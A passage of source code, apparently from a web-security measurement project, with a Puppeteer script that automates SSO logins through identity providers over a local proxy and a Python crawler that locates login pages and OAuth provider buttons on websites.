'--disable-popup-blocking', 396 | '--disable-notifications', 397 | '--password-store=basic', 398 | '--proxy-server=http://127.0.0.1:7777', 399 | '--ignore-certificate-errors'], 400 | headless: false, 401 | executablePath: '/bin/google-chrome-stable'}); 402 | const page = await browser.newPage(); 403 | try{ 404 | await page.goto(SITE, {timeout:120000, waitUntil: 'networkidle2'}); 405 | }catch(ex){ 406 | console.log("error in surfing to the login page!ABORT-EXPERIMENT:YES"); 407 | console.log(ex); 408 | await browser.close(); 409 | process.exit(1); 410 | } 411 | let initial_url=page.url(); 412 | if(initial_url.includes("#")){ 413 | console.log("remove fragment from initial url: %s",initial_url); 414 | initial_url=initial_url.split("#")[0]; 415 | console.log("new url: %s",initial_url); 416 | } 417 | 418 | var domainbegin = TLDJS.parse(initial_url).domain; 419 | await page.waitForTimeout(5000); 420 | 421 | //take screenshot 422 | await page.screenshot({path: OutputPath+OutputName+"_Initial.png" ,fullPage: true}); 423 | 424 | //click XPath 425 | try{ 426 | var SSO_Elem = await page.$x(XPathSSOElem); 427 | }catch(ex){ 428 | if(ex.message.includes("Evaluation failed")){ 429 | console.log("try using a selector"); 430 | var SSO_Elem= await page.click(XPathSSOElem); 431 | } 432 | } 433 | console.log("SSO_Elem: %s",SSO_Elem); 434 | try{ 435 | var SSO_Elem = await page.$x(XPathSSOElem); 436 | console.log("SSO_Elem: %s",SSO_Elem); 437 | await Promise.all([SSO_Elem[0].click(), 438 | page.waitForNavigation({timeout:20000, waitUntil: 'networkidle2'})]); 439 | } 440 | catch{ 441 | console.log("click do not caused the redirect check if opened a new windows or stop"); 442 | } 443 | //gives time to obtain any new tab opened 444 | await page.waitForTimeout(3000); 445 | var Open_Pages = await browser.pages(); 446 | console.log("numbers of pages after click:%s",Open_Pages.length); 447 | 448 | /* 449 | for (var i = 0; i < Open_Pages.length; i++) { 450 | console.log("tab:%s) domain tab: %s",i,TLDJS.parse(Open_Pages[i].url()).domain); 451 | } 452 | 453 | 454 | let opentabscheck = Open_Pages.length; 455 | if(opentabscheck<=2){//no new windows 456 | var check_urlfirst=page.url() 457 | var domaincheck = TLDJS.parse(check_urlfirst).domain; 458 | 459 | if(check_urlfirst===initial_url){ 460 | //try to use different methof to trigger login with IDP 461 | console.log("test new trigger method"); 462 | if(IDP.includes(".")){ 463 | temp="//*[contains(text(), \'"+IDP.split(".")[0]+"\')]" 464 | } 465 | else{ 466 | temp="//*[contains(text(), \'"+IDP+"\')]" 467 | } 468 | var new_trigger = await page.$x(temp); 469 | try{ 470 | await new_trigger[0].click(); 471 | } 472 | catch(ex){ 473 | console.log("new trigger not working Continue"); 474 | } 475 | } 476 | } 477 | */ 478 | await page.waitForTimeout(6000); 479 | 480 | //Step3: identify new open window(it need one sec to identify new windows) and take a screenshot of initial tab page after SSO click 481 | console.log("step3:identify if open new window and go ahead with login"); 482 | let opentabs = Open_Pages.length; 483 | console.log("numbers of pages after click:%s",Open_Pages.length); 484 | Open_Pages[1].screenshot({path: OutputPath+OutputName+"_AfterSSOClick.png" ,fullPage: true}); 485 | 486 | if(opentabs>2){//new window case 487 | //Step4: look at tabs and if there is one with IDP domain go and perform login 488 | try{ 489 | var tabindex_IDP=-1; 490 | for (var i = 0; i < Open_Pages.length; i++) { 491 | if(Open_Pages[i].url()!=initial_url && Open_Pages[i].url()!="about:blank"){ 
492 | selector=await ObtainSelector(IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"]); 493 | //check if the page has the username form for the login or the IDP as domain 494 | console.log("obtained this selector: %s",selector); 495 | try{ 496 | test=await Open_Pages[i].waitForSelector(selector,{timeout:10000}); 497 | }catch(ex){ 498 | if(ex.message.includes("failed")){ 499 | console.log("not found username form in tab!"); 500 | test=null; 501 | } 502 | } 503 | console.log("result of the selector search:%s",test); 504 | if(!(test===null) || TLDJS.parse(Open_Pages[i].url()).domain===IDP){ 505 | var tabindex_IDP=i; 506 | } 507 | } 508 | } 509 | 510 | console.log("tab index after search:%s",tabindex_IDP); 511 | if (tabindex_IDP===-1){ 512 | console.log("tab not found!!"); 513 | console.log("Open a new tab but not with the idp domain check xpath! ABORT-EXPERIMENT:YES"); 514 | await browser.close(); 515 | process.exit(1); 516 | } 517 | else{ 518 | newwindow=true; 519 | let newurl=Open_Pages[tabindex_IDP].url(); 520 | 521 | //fill forms 522 | var asd=await Fillform(Open_Pages[tabindex_IDP],IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"],IDP_Info["Username"]); 523 | console.log("new window result first fill form: %s",asd); 524 | if(asd===false){ 525 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 526 | await browser.close(); 527 | process.exit(1); 528 | } 529 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 530 | await Exception(Open_Pages[tabindex_IDP],asd,"login"); 531 | } 532 | Open_Pages[tabindex_IDP].bringToFront(); 533 | 534 | await Open_Pages[tabindex_IDP].waitForTimeout(3000); 535 | asd=await Fillform(Open_Pages[tabindex_IDP],IDP_Info["Fill"]["Pass-Type"],IDP_Info["Fill"]["Form-Pass"],IDP_Info["Password"]); 536 | console.log("new window result first fill form: %s",asd); 537 | if(asd===false){ 538 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 539 | await browser.close(); 540 | process.exit(1); 541 | } 542 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 543 | await Exception(Open_Pages[tabindex_IDP],asd,"login"); 544 | } 545 | 546 | await Open_Pages[tabindex_IDP].waitForTimeout(5000); 547 | //click button 548 | try{ 549 | await Promise.all([asd= Click_Button(Open_Pages[tabindex_IDP],IDP_Info["Submit"]["Button-Type"],IDP_Info["Submit"]["Button"],"Submit"), 550 | Open_Pages[tabindex_IDP].waitForNavigation({ waitUntil: 'load'})]); 551 | }catch(error){ 552 | console.log("new windows case:login click do not change page check Login selector!!"); 553 | } 554 | 555 | await Open_Pages[tabindex_IDP].waitForTimeout(5000); 556 | //wait for confirmation login 557 | //await Open_Pages[tabindex_IDP].waitForTimeout(100000); 558 | //grant wait for network idle since some IDP skip this step so no navigation happening 559 | try{ 560 | await Promise.all([asd=Click_Button(Open_Pages[tabindex_IDP],IDP_Info["Grant"]["Button-Type"],IDP_Info["Grant"]["Button"],"Grant"), 561 | Open_Pages[tabindex_IDP].waitForNetworkIdle({waitUntil: 'networkidle2'})]); 562 | }catch(error){ 563 | console.log("new windows case:potential error in the grant step chek if redirected to initial site and verify login"); 564 | } 565 | //Check if extra step in dict or just do it based on idp name 566 | if("ExtraStep" in IDP_Info){ 567 | await Exception(Open_Pages[tabindex_IDP],IDP_Info["ExtraStep"]["instructions"],"extra-step"); 568 | } 569 | } 570 | }catch(ex){ 571 | console.log("error in Step4 continue?"); 572 | 
console.log(ex); 573 | } 574 | 575 | } 576 | else {//Step4alt: no new window check url if IDP domain or found form username and then perform the login in the same tab 577 | console.log("Step4alt: check url and do login in the same tab"); 578 | await page.waitForTimeout(3000); 579 | var check_url=page.url(); 580 | var domaincheck = TLDJS.parse(check_url).domain; 581 | 582 | if(check_url===initial_url){ 583 | console.log("no new window and same initial url login trigger not working"); 584 | await browser.close(); 585 | console.log("unable to trigger IDP login ABORT-EXPERIMENT:YES"); 586 | process.exit(1); 587 | } 588 | else{ 589 | console.log("check IDP:%s and domaincheck:%s",IDP,domaincheck); 590 | //idp domain or found unername form 591 | selector=await ObtainSelector(IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"]); 592 | console.log("obtained this selector: %s",selector); 593 | try{ 594 | test=await page.waitForSelector(selector,{timeout:10000}); 595 | }catch(ex){ 596 | if(ex.message.includes("failed")){ 597 | console.log("not found username form in tab!"); 598 | test=null; 599 | } 600 | } 601 | console.log("result of the selector search:%s",test); 602 | 603 | if( IDP===domaincheck || !(test===null) ){ 604 | //redirected to IDP page for login 605 | 606 | //fill forms 607 | var asd=await Fillform(page,IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"],IDP_Info["Username"]); 608 | console.log("same page result first fill form: %s",asd); 609 | if(asd===false){ 610 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 611 | await browser.close(); 612 | process.exit(1); 613 | } 614 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 615 | await Exception(page,asd,"login"); 616 | } 617 | await page.waitForTimeout(3000); 618 | asd= await Fillform(page,IDP_Info["Fill"]["Pass-Type"],IDP_Info["Fill"]["Form-Pass"],IDP_Info["Password"]); 619 | console.log("same page result second fill form: %s",asd); 620 | if(asd===false){ 621 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 622 | await browser.close(); 623 | process.exit(1); 624 | } 625 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 626 | await Exception(page,asd,"login"); 627 | } 628 | await page.waitForTimeout(5000); 629 | 630 | //click button 631 | try{ 632 | await Promise.all([asd=Click_Button(page,IDP_Info["Submit"]["Button-Type"],IDP_Info["Submit"]["Button"],"Submit"), 633 | page.waitForNavigation({ waitUntil: 'load'})]); 634 | }catch(error){ 635 | console.log("same windows case:login click do not change page check Login selector!!"); 636 | } 637 | await page.waitForTimeout(5000); 638 | //wait for confirmation login 639 | //await page.waitForTimeout(100000); 640 | //grant wait for network idle since some IDP skip this step so no navigation happening 641 | try{ 642 | await Promise.all([asd= await Click_Button(page,IDP_Info["Grant"]["Button-Type"],IDP_Info["Grant"]["Button"],"Grant"), 643 | page.waitForNetworkIdle({waitUntil: 'networkidle2'})]); 644 | }catch(error){ 645 | console.log("same windows case:potential error in the grant step chek if redirected to initial site and verify login"); 646 | } 647 | //Check if extra step in dict or just do it based on idp name 648 | if("ExtraStep" in IDP_Info){ 649 | await Exception(page,IDP_Info["ExtraStep"]["instructions"],"extra-step"); 650 | } 651 | } 652 | else{ 653 | console.log("no new window and no redirection to IDP domain but changed url error in xpath!!"); 654 | 
console.log("initial url:%s \n checkurl:%s",initial_url,check_url); 655 | //search for error in url or page 656 | await browser.close(); 657 | console.log("error in dompath or other ABORT-EXPERIMENT:YES"); 658 | process.exit(1); 659 | } 660 | } 661 | } 662 | 663 | //Step5:identify succesfull login:take a screenshot after login,inspect url page,search identifiers 664 | console.log("Step5:check if succesful login"); 665 | //gives time to redirect and then wait for page to be ready 666 | await page.waitForTimeout(10000); 667 | await page.screenshot({path: OutputPath+OutputName+"_AfterSSOLogin.png" ,fullPage: true}); 668 | var checktab= await browser.pages(); 669 | let opentabs2 = checktab.length; 670 | console.log("number of open tabs after SSOLogin:%s",opentabs2); 671 | 672 | if(newwindow){ 673 | if(opentabs2>2){//open new tab still open check if IDP domain and if initial page with same url 674 | console.log("more than 3 tabs open at the end of the measurement"); 675 | try{ 676 | var nw_closecode = await AnalizeResult_New_Window(browser,IDP,page,Open_Pages[tabindex_IDP],domainbegin,initial_url,measurement); 677 | }catch(ex){ 678 | console.log("error in the final evaluation new windows:%s",ex.message); 679 | 680 | } 681 | await browser.close(); 682 | process.exit(nw_closecode); 683 | } 684 | console.log("used new window for login but closed it"); 685 | } 686 | 687 | let return_url=page.url(); 688 | var domainreturn = TLDJS.parse(return_url).domain; 689 | var html=await page.content(); 690 | 691 | try{ 692 | var closecode = await AnalizeResult(browser,IDP,domainbegin,initial_url,domainreturn,return_url,html,measurement); 693 | } 694 | catch(ex){ 695 | console.log("error in the final evaluation:%s",ex.message); 696 | } 697 | //close the browser and use return as exit code 698 | await browser.close(); 699 | process.exit(closecode); 700 | })(); 701 | -------------------------------------------------------------------------------- /idps-identification.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | from requests.exceptions import SSLError, ConnectionError, ReadTimeout 8 | from urllib3.exceptions import NewConnectionError, MaxRetryError, ReadTimeoutError 9 | from urllib.parse import urlparse, urlunparse, urljoin, urldefrag 10 | from selenium import webdriver 11 | from bs4 import BeautifulSoup 12 | 13 | import traceback 14 | import argparse 15 | import requests 16 | import logging 17 | import random 18 | import string 19 | import json 20 | import time 21 | import sys 22 | import os 23 | import re 24 | 25 | # ============================================================================= 26 | # ============================================================================= 27 | # ================================= FUNCTIONS ================================= 28 | # ============================================================================= 29 | # ============================================================================= 30 | 31 | # ============================================================================= 32 | # ========================= Basic crawling functions ========================== 33 | # ============================================================================= 34 | 35 | def get_template_url(url, _path=True): 36 | """ 37 | Returns the template of the passed URL. 
The template contains: 38 | - the netloc (domain) 39 | - the path (if path=True) 40 | Everything else is removed. 41 | """ 42 | try: 43 | parsed = urlparse(urldefrag(url)[0]) 44 | if _path: 45 | return urlunparse(('', parsed.netloc, parsed.path, '', '', '')) 46 | else: 47 | if len(parsed.path.split('/')) > 1: 48 | path = parsed.path.replace(parsed.path.split('/')[-1], '') 49 | else: 50 | path = parsed.path 51 | return urlunparse(('', parsed.netloc, re.sub('\d+', '', path), '', '', '')) 52 | except: 53 | logger.debug(traceback.format_exc()) 54 | return None 55 | 56 | def get_domain_name(url): 57 | """ 58 | Returns the domain name of the passed URL 59 | (Ignore top level domain and subdomains). 60 | """ 61 | try: 62 | if url.startswith('http') and '//' in url: 63 | parsed = urlparse(urldefrag(url)[0]) 64 | split_netloc = parsed.netloc.replace('www.', '').split('.') 65 | else: 66 | split_netloc = url.split('.') 67 | if len(split_netloc) > 2: 68 | if len(split_netloc[-2]) >= 3: 69 | return split_netloc[-2] 70 | else: 71 | return split_netloc[-3] 72 | elif len(split_netloc) == 2: 73 | return split_netloc[-2] 74 | else: 75 | return '' 76 | except: 77 | logger.debug(url, split_netloc) 78 | logger.debug(traceback.format_exc()) 79 | return None 80 | 81 | def get_domain(url): 82 | """ 83 | Returns the domain name of the passed URL. 84 | """ 85 | return urlparse(url).netloc 86 | 87 | def is_internal_url(url): 88 | """ 89 | Returns True if the url is internal to the website. 90 | Ignores the top level domain: 91 | e.g., google.com and google.it are considered the same domain. 92 | """ 93 | try: 94 | if not url.startswith('http'): 95 | url = 'http://' + url 96 | parsed = urlparse(url) 97 | if get_domain_name(parsed.netloc).endswith(get_domain_name(SITE)): 98 | return True 99 | else: 100 | return False 101 | except: 102 | logger.error(traceback.format_exc()) 103 | return False 104 | 105 | def get_links(page_url, html, only_internal=True): 106 | """ 107 | Receives a URL and the body of the web page 108 | and returns a set of all links found in the page 109 | if only_internal is True, only internal links are returned. 110 | """ 111 | links = [] 112 | 113 | try: 114 | soup = BeautifulSoup(html, 'html.parser') 115 | 116 | for link in soup.find_all('a', href=True): 117 | url = urljoin(clean_url(page_url), clean_url(link['href'])) 118 | 119 | if 'http' in url and only_internal and is_internal_url(url): 120 | links.append(clean_url(urldefrag(url)[0])) 121 | 122 | elif not only_internal: 123 | _url = clean_url(urldefrag(url)[0]) 124 | if any([i in _url for i in DENYLISTED_DOMAINS]): 125 | continue 126 | 127 | links.append(_url) 128 | except: 129 | logger.debug(traceback.format_exc()) 130 | 131 | return sorted(links) 132 | 133 | def get_source_code_links(url, html): 134 | """ 135 | Returns a list of all links found in the 136 | source code of the passed page. 
137 | """ 138 | 139 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 140 | links = [] 141 | 142 | # Find links in the source code using regular expressions 143 | regex_links = re.findall("((?:https?:\/\/|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}\/)(?:[^\s()<>\"\']+|\(([^\s()<>\"\']+|(\([^\s()<>\"\']+\)))*\))+(?:\(([^\s()<>\"\']+|(\([^\s()<>\"\']+\)))*\)|[^\s`!()\[\]{};:'\".,<>?]))", html) 144 | links = [''.join(link) for link in regex_links if not any([i in link for i in DENYLISTED_DOMAINS])] 145 | 146 | soup = BeautifulSoup(html, 'html.parser') 147 | # and in tags that have an href 148 | for link in soup.find_all(href=True): 149 | href = link['href'] 150 | links.append(urljoin(url, href)) 151 | # and in forms actions 152 | forms = soup.find_all('form') 153 | for form in forms: 154 | try: 155 | action = form.get('action') 156 | if action != None: 157 | links.append(urljoin(url, action)) 158 | except: 159 | pass 160 | 161 | # and in buttons (action, href, data-url, data-href, ecc) 162 | buttons = soup.find_all('button') 163 | for button in buttons: 164 | try: 165 | action = urljoin(url, button.get('action')) 166 | if action != None: 167 | links.append(action) 168 | except: 169 | pass 170 | 171 | for button in buttons: 172 | try: 173 | data_url = button.get('data-url') 174 | if data_url != None: 175 | links.append(urljoin(url, data_url)) 176 | data_href = button.get('data-href') 177 | if data_href != None: 178 | links.append(urljoin(url, data_href)) 179 | formaction = button.get('formaction') 180 | if formaction != None: 181 | links.append(urljoin(url, formaction)) 182 | except: 183 | pass 184 | 185 | return links 186 | 187 | def add_to_queue(url, exclude_denylisted=True): 188 | """ 189 | Add a url to the queue if it is not already in the queue 190 | and if its template is not already in the visited list. 191 | """ 192 | try: 193 | if exclude_denylisted and any([i in url for i in DENYLISTED_PATTERNS]): 194 | return 195 | domain = get_domain(url) 196 | 197 | if not is_visited(url): 198 | if domain not in queue: 199 | queue[domain] = [] 200 | if url not in queue[domain]: 201 | queue[domain].append(url) 202 | except: 203 | if DEBUG: 204 | logger.error(traceback.format_exc()) 205 | 206 | def add_to_visited(url): 207 | """ 208 | Add a url to the visited list. 209 | """ 210 | try: 211 | if not is_visited(url): 212 | domain = get_domain(url) 213 | if domain not in visited_urls: 214 | visited_urls[domain] = [] 215 | 216 | template_url = get_template_url(url) 217 | visited_urls[domain].append(template_url) 218 | 219 | except: 220 | if DEBUG: 221 | logger.error(traceback.format_exc()) 222 | 223 | def is_visited(url): 224 | """ 225 | Return True if the template of the url 226 | is in the visited list. 227 | """ 228 | try: 229 | domain = get_domain(url) 230 | if not domain in visited_urls: 231 | return False 232 | 233 | template_url = get_template_url(url) 234 | if template_url is not None and \ 235 | template_url in visited_urls[domain]: 236 | return True 237 | else: 238 | return False 239 | except: 240 | if DEBUG: 241 | logger.error(traceback.format_exc()) 242 | return False 243 | 244 | def get_url_from_queue(visited=False): 245 | """ 246 | Return the first not visited url in the queue 247 | if the visited list for this domain is not full. 
248 | """ 249 | domains = list(queue.keys()) 250 | random.shuffle(domains) 251 | 252 | try: 253 | for domain in domains: 254 | # If the visited list for this domain 255 | # is full, choose a new domain 256 | if domain in visited_urls and \ 257 | len(visited_urls[domain]) >= MAX: 258 | continue 259 | else: 260 | # Pop the first url in the queue 261 | # for this domain 262 | while len(queue[domain]) > 0: 263 | url = queue[domain].pop(0) 264 | if not is_visited(url): 265 | if visited: 266 | add_to_visited(url) 267 | return url 268 | except: 269 | if DEBUG: 270 | logger.error(traceback.format_exc()) 271 | return None 272 | 273 | def should_continue(): 274 | """ 275 | Return True if the queue is not empty 276 | and the visited list is not full. 277 | """ 278 | try: 279 | for domain in queue: 280 | if domain not in visited_urls or \ 281 | (len(visited_urls[domain]) < MAX and \ 282 | len(queue[domain]) > 0): 283 | return True 284 | except: 285 | if DEBUG: 286 | logger.error(traceback.format_exc()) 287 | return False 288 | 289 | # ============================================================================= 290 | # ====================== Login detection functions ============================ 291 | # ============================================================================= 292 | 293 | def get_login_url(urls): 294 | """ 295 | Return the login url from the list of urls (if present). 296 | """ 297 | for url in urls: 298 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 299 | # logger.info(f'{bcolors.OKGREEN}[+]{bcolors.ENDC} {url}') 300 | 301 | denylist = ['/hc/', 'facebook', 'google'] 302 | 303 | if '/signin' in cleaned_url or \ 304 | '/login' in cleaned_url and \ 305 | '/join' in cleaned_url and \ 306 | not any(i in cleaned_url for i in denylist): 307 | # logger.info(f'Login url found: {bcolors.OKGREEN}{url}{bcolors.ENDC} because contains /login or /signin') 308 | return url 309 | 310 | for url in urls: 311 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 312 | 313 | if 'signin' in cleaned_url or \ 314 | 'login' in cleaned_url and \ 315 | not any(i in cleaned_url for i in denylist): 316 | # logger.info(f'Login url found: {bcolors.OKGREEN}{url}{bcolors.ENDC} because contains login or signin') 317 | return url 318 | return '' 319 | 320 | def is_login_page(url, html): 321 | """ 322 | Return True if the current page is a login PAGE. 
323 | """ 324 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 325 | 326 | if 'login' in cleaned_url or \ 327 | 'signin' in cleaned_url: 328 | return True 329 | 330 | soup = BeautifulSoup(html, 'html.parser') 331 | password = soup.find('input', {'type' : 'password'}) 332 | if password is not None: 333 | return True 334 | return False 335 | 336 | def get_oauth_link(urls, provider): 337 | """ 338 | Return provider's OAuth link 339 | from a list of URLs 340 | """ 341 | for url in urls: 342 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 343 | denylist = [ 344 | 'itunes.apple', 'play.google', 'googleapis', 'googleads', 'doubleclick', 'googletagmanager.com', 'apis.google.com', '/hc/', 'assets', '.gif', '.jpeg', '.jpg', '.png', '.css', '.js', 345 | '/gsi/style', '/gsi/client', 'captcha', 'designing' 346 | ] 347 | 348 | denylisted_extensions = ['.gif', '.jpeg', '.jpg', '.png', '.css', '.js', '.svg', '.woff', '.woff2', '.ttf', '.eot', '.otf', '.ico', '.xml', '.json', '.txt'] 349 | parsed = urlparse(cleaned_url) 350 | if parsed.path.endswith(tuple(denylisted_extensions)): 351 | return '' 352 | 353 | # Expand denylist for specific providers 354 | denylist = extend_denylist(provider, denylist) 355 | 356 | if provider in cleaned_url and \ 357 | not any(x in url for x in denylist) and \ 358 | ( 'auth' in cleaned_url or \ 359 | 'login' in cleaned_url or\ 360 | 'account' in cleaned_url or\ 361 | 'signin' in cleaned_url ): 362 | return url 363 | return '' 364 | 365 | def is_oauth_tag(tag, provider): 366 | """ 367 | Return True if the tag is an OAuth login button 368 | """ 369 | # Limit length 370 | if len(str(tag)) > 5000: 371 | return False 372 | 373 | combined = '' 374 | 375 | if type(tag.text) == str: 376 | combined += ';' + tag.text.strip().replace('\n', '') 377 | elif type(tag.text) == list: 378 | # ??? 
379 | logger.info(type(tag.text)) 380 | logger.info(str(tag)) 381 | for value in tag.attrs.values(): 382 | if type(value) == str: 383 | combined += ';' + value.strip() 384 | elif type(value) == list: 385 | combined += ';' + '_'.join([x.strip() for x in value]) 386 | else: 387 | #logger.info(type(value)) 388 | #logger.info(str(tag)) 389 | pass 390 | 391 | denylist = [ 392 | 'itunesapple', 'playgoogle', 'googleapis', 'googleads', 'doubleclick', 'googletagmanagercom', 'apisgooglecom', 393 | 'captcha', 'designing'] 394 | # Expand denylist for specific providers 395 | denylist = extend_denylist(provider, denylist) 396 | 397 | combined = combined.lower().replace('\n', '').replace('-', '').replace('.', '').replace('_', '').strip() 398 | while ' ' in combined: 399 | combined = combined.replace(' ', ' ') 400 | 401 | if ( 402 | provider in combined and 403 | not any(x.replace('.', '') in combined for x in denylist) and 404 | any(x in combined for x in OAUTH_KEYWORDS)): 405 | return True 406 | 407 | def get_oauth_tag(html, provider, all_tags=True): 408 | """ 409 | Return the XPath to the OAuth login button 410 | """ 411 | provider = provider.lower().strip() 412 | soup = BeautifulSoup(html, 'html.parser') 413 | 414 | # Begin with the most specific tags 415 | for tag in soup.find_all(["a", "input", "button"]): 416 | if is_oauth_tag(tag, provider): 417 | xpath = get_xpath(soup, tag) 418 | return str(tag), xpath 419 | 420 | if not all_tags: 421 | return None, None 422 | 423 | # Note: searching in less specific tags might increase the number of false positives 424 | for tag in soup.find_all(): 425 | if tag.name in ["a", "input", "button", "script"]: 426 | continue 427 | if is_oauth_tag(tag, provider): 428 | xpath = get_xpath(soup, tag) 429 | return str(tag), xpath 430 | 431 | return None, None 432 | 433 | # ============================================================================= 434 | # ============================= Helper functions ============================== 435 | # ============================================================================= 436 | 437 | def get_random_string(start=10, end=20): 438 | return ''.join(random.choice(string.ascii_letters + string.digits + '_') for _ in range(random.randint(start, end))) 439 | 440 | def clean_url(url): 441 | """ 442 | Cleans the url to remove any trailing newlines and spaces. 443 | """ 444 | return url.strip().strip('\n') 445 | 446 | def url_to_filename(url): 447 | """ 448 | Converts a URL to a filename. 449 | """ 450 | template_url = get_template_url(url).split('.')[0] # Also remove the extension 451 | name = '' 452 | for c in template_url: 453 | if c in string.ascii_letters + string.digits: 454 | name += c 455 | return name 456 | 457 | def extend_denylist(provider, denylist): 458 | ''' 459 | Extend the denylist with specific 460 | patterns for the current provider. 
461 | ''' 462 | if provider == 'ok': 463 | denylist.extend(['facebook', 'token', 'cookie', 'Token']) 464 | # OK has a lot of false positives, so we also add all the other providers 465 | denylist.extend([provider.lower() for provider in PROVIDERS if provider.lower() != 'ok']) 466 | if provider == 'line': 467 | denylist.extend(['inline', 'streamline', 'guideline', 'offline', 'outline', 'online', 'underline', 'timeline', 'line-height', 'line-width']) 468 | if provider == 'google': 469 | denylist.extend(['playgooglecom', 'analytics', '/gsi/style']) 470 | if provider == 'amazon': 471 | denylist.extend(['amazonawscom']) 472 | if provider == 'stackoverflow': 473 | denylist.extend(['/question/']) 474 | if provider == 'facebook': 475 | denylist.extend(['sharerphp']) 476 | if provider == 'linkedin': 477 | denylist.extend(['share']) 478 | if provider == 'microsoft': 479 | denylist.extend(['jsdisabled']) 480 | if provider == 'reddit': 481 | denylist.extend(['submit']) 482 | if provider == 'yahoo': 483 | denylist.extend(['analytics']) 484 | if provider == 'twitter': 485 | denylist.extend(['intent']) 486 | 487 | return denylist 488 | 489 | def remove_query_string(url): 490 | """ 491 | Removes the query string from the url. 492 | """ 493 | return url.split('?')[0] 494 | 495 | def save_dictionaries(site, logs_dir): 496 | """ 497 | Save the dictionaries to the files. 498 | """ 499 | global urls, queue, visited_urls 500 | 501 | logs = { 502 | 'queue': queue, 503 | 'visited': visited_urls 504 | } 505 | if not os.path.exists(logs_dir): 506 | os.makedirs(logs_dir) 507 | with open(f'{logs_dir}/{site}-log.json', 'w') as f: 508 | json.dump(logs, f, indent=4) 509 | logger.info(f'Saved logs to {logs_dir}/{site}-log.json') 510 | 511 | if not os.path.exists('links/'): 512 | os.makedirs('links/') 513 | with open(f'links/{site}-links.json', 'w') as f: 514 | json.dump(urls, f, indent=4) 515 | logger.info(f'Saved links to links/{site}-links.json') 516 | 517 | def get_dictionaries(): 518 | """ 519 | Load the dictionaries from the files. 520 | """ 521 | global urls, queue, visited_urls 522 | 523 | if os.path.exists(f'{LOGS}/{SITE}-log.json'): 524 | with open(f'{LOGS}/{SITE}-log.json', 'r') as f: 525 | logs = json.load(f) 526 | queue = logs['queue'] 527 | visited_urls = logs['visited'] 528 | if os.path.exists(f'links/{SITE}-links.json'): 529 | with open(f'links/{SITE}-links.json', 'r') as f: 530 | urls = json.load(f) 531 | 532 | # XPath generation 533 | def get_xpath(soup, tag): 534 | """ 535 | Generates the XPath to the tag. 
536 | """ 537 | 538 | # Prioritize the tag's id 539 | _id = tag.get('id') 540 | if _id: 541 | if type(_id) == list: 542 | return f'//{tag.name}[@id="{" ".join(_id)}"]' 543 | else: 544 | return f'//{tag.name}[@id="{_id}"]' 545 | 546 | # Then the tag's class (only if unique throuout the page) 547 | _class = tag.get('class') 548 | if len(soup.find_all(tag.name, class_=_class)) == 1: 549 | if type(_class) == list: 550 | return f'//{tag.name}[@class="{" ".join(_class)}"]' 551 | else: 552 | return f'//{tag.name}[@class="{_class}"]' 553 | 554 | # Then the ids of the tag's children 555 | for child in tag.findChildren(): 556 | _id = child.get('id') 557 | if _id: 558 | if type(_id) == list: 559 | return f'//{child.name}[@id="{" ".join(_id)}"]' 560 | else: 561 | return f'//{child.name}[@id="{_id}"]' 562 | 563 | # Then the classes of the tag's children (only if unique throuout the page) 564 | for child in tag.findChildren(): 565 | _class = child.get('class') 566 | if _class: 567 | if len(soup.find_all(child.name, class_=_class)) == 1: 568 | if type(_class) == list: 569 | return f'//{child.name}[@class="{" ".join(_class)}"]' 570 | else: 571 | return f'//{child.name}[@class="{_class}"]' 572 | 573 | # If nothing worked, resort to the tag's text 574 | text = tag.text.strip().replace('\n', '') 575 | if text != '': 576 | return f'//{tag.name}/*[contains(text(), "{text}")]' 577 | return None 578 | 579 | # ============================================================================= 580 | # ============================================================================= 581 | # ============================== GLOBAL VARIABLES ============================= 582 | # ============================================================================= 583 | # ============================================================================= 584 | 585 | class bcolors: 586 | HEADER = '\033[95m' 587 | OKBLUE = '\033[94m' 588 | OKCYAN = '\033[96m' 589 | OKGREEN = '\033[92m' 590 | WARNING = '\033[93m' 591 | FAIL = '\033[91m' 592 | ENDC = '\033[0m' 593 | BOLD = '\033[1m' 594 | UNDERLINE = '\033[4m' 595 | 596 | # Dictionaries where the key is the domain and the value is a list of URLs 597 | queue = {} 598 | visited_urls = {} 599 | 600 | # Information dictionary 601 | urls = { 602 | 'site': '', 603 | 'homepage': '', 604 | 'login': {}, # Login pages URLs: {'idp': {...}} 605 | 'idps': [] 606 | } 607 | 608 | # Session: python requests browser 609 | session = requests.Session() 610 | 611 | # Logger 612 | logging.basicConfig() 613 | logger = logging.getLogger('idps-identification') 614 | 615 | # CONSTANTS 616 | PROVIDERS = [ 617 | 'google', 'facebook', 'twitter', 'linkedin', 'github', 618 | 'slack', 'microsoft', 'vk', 'vkontakte', 'apple', 619 | 'amazon', 'kakao', 'yahoo', 'naver', 620 | 'line', 'mailru', 'nintendo', 'paypal', 'reddit', 621 | 'bitbucket', 'stackoverflow', 'instagram', 'odnoklassniki', 622 | 'twitch', 'yandex', 'steam', 'pinterest', 'rambler', 623 | 'weibo', 'sina', 'envato', 'soundcloud', 'tumblr', 624 | 'dropbox', 'spotify', 'stackexchange', 'alipay', 625 | 'aliexpress', 'clever', 'docomo', 'ok'] 626 | 627 | OAUTH_KEYWORDS = [ 628 | 'auth', 'login', 'account', 'signin', 629 | 'signon', 'register', 'continue', 630 | 'authentication', 'dialog' 631 | ] 632 | 633 | DEBUG 